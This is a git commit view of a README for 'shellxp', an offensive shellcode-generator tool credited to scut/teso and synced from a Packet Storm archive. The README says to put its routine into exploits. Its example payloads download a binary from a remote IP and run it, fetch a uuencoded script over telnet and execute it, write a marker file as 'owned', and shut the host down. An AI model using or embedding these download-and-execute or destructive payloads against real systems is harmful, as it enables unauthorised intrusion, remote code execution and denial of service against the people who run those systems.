diff options
| author | SkyperTHC | 2026-03-03 06:28:55 +0000 |
|---|---|---|
| committer | SkyperTHC | 2026-03-03 06:28:55 +0000 |
| commit | 5d3573ef7a109ee70416fe94db098fe6a769a798 (patch) | |
| tree | dc2d5b294c9db8ab2db7433511f94e1c4bb8b698 /other/shell/README | |
| parent | c6c59dc73cc4586357f93ab38ecf459e98675cc5 (diff) | |
packetstorm sync
Diffstat (limited to 'other/shell/README')
| -rw-r--r-- | other/shell/README | 38 |
1 files changed, 38 insertions, 0 deletions
diff --git a/other/shell/README b/other/shell/README new file mode 100644 index 0000000..b6fbeaa --- /dev/null +++ b/other/shell/README | |||
| @@ -0,0 +1,38 @@ | |||
| 1 | |||
| 2 | gcc -o shellxp shellxp.c | ||
| 3 | |||
| 4 | ./shellxp commands ... | ||
| 5 | |||
| 6 | or to exec the generated shellcode | ||
| 7 | |||
| 8 | ./shellxp exec commands ... | ||
| 9 | |||
| 10 | |||
| 11 | either rip the sc_build routine into your exploits to directly create the | ||
| 12 | shellcode on the fly, or prepare it. | ||
| 13 | |||
| 14 | some examples: | ||
| 15 | |||
| 16 | ./shellxp /bin/sh -c "lynx -source 1.1.1.1/a>a;chmod +x a;./a" | ||
| 17 | ./shellxp /bin/sh -c "echo haha > /tmp/owned" | ||
| 18 | ./shellxp /sbin/shutdown -h now | ||
| 19 | |||
| 20 | or especially fancy ;-) | ||
| 21 | |||
| 22 | ./shellxp /bin/sh -c "((echo GET /test/ HTTP/1.0;echo;sleep 5)|telnet www.foo.org 80)|uudecode;/tmp/run.sh" | ||
| 23 | |||
| 24 | (where /test/index.html is an uuencoded file that will uudecode to an executeable /tmp/run.sh file) | ||
| 25 | modify the "sleep 5" to an appropiate value to allow the file to get retrieved :-) | ||
| 26 | |||
| 27 | (imagine some other fancy stuff in here :-) | ||
| 28 | ... | ||
| 29 | |||
| 30 | -scut/teso. | ||
| 31 | |||
| 32 | |||
| 33 | to modify the shellcode, use: | ||
| 34 | |||
| 35 | gcc -o shellcode shellcode.c sc.s | ||
| 36 | ./shellcode <-- will dump the code | ||
| 37 | ./shellcode foo <-- will dump and run the code | ||
| 38 | |||